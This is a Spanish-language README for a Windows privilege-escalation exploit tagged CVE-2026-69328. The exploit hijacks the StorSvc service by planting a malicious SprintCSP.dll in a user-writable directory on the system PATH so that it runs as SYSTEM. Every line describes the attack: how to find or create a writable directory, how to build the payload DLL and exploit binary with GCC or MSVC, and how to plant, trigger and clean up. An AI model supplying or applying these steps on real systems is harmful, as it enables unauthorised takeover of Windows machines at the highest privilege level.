
Exploit de escalada de privilegios en Windows que coloca SprintCSP.dll en un directorio HKLM PATH con permisos de escritura para el usuario, con el fin de secuestrar StorSvc y ejecutarse como SYSTEM.
StorSvc carga SprintCSP.dll por nombre relativo como SYSTEM. Colócala en un directorio PATH de HKLM con permisos de escritura para el usuario y obtén SYSTEM.
Requiere un directorio con permisos de escritura para el usuario en HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path.
Ninguno en una imagen limpia. Los instaladores de herramientas los añaden (%USERPROFILE%\.cargo\bin, .local\bin, Python Scripts). Si la máquina no tiene ninguno, CVE-2026-69328.exe --setup crea uno, lo que requiere un aviso de administrador único. El exploit en sí nunca necesita administrador.
GCC:
gcc payload.c -shared -o SprintCSP.dll
gcc CVE-2026-69328.c -lrpcrt4 -ladvapi32 -lshell32 -o CVE-2026-69328.exe
MSVC:
cl /LD payload.c /Fe:SprintCSP.dll
cl CVE-2026-69328.c rpcrt4.lib advapi32.lib shell32.lib /Fe:CVE-2026-69328.exe
CVE-2026-69328.exe plant, trigger, read proof
CVE-2026-69328.exe --cleanup remove proof file + planted DLL
La prueba se deposita en C:\Windows\System32\CVE-2026-69328.txt.
StorSvc se bloquea tras la carga y SCM lo reinicia después de ~120s.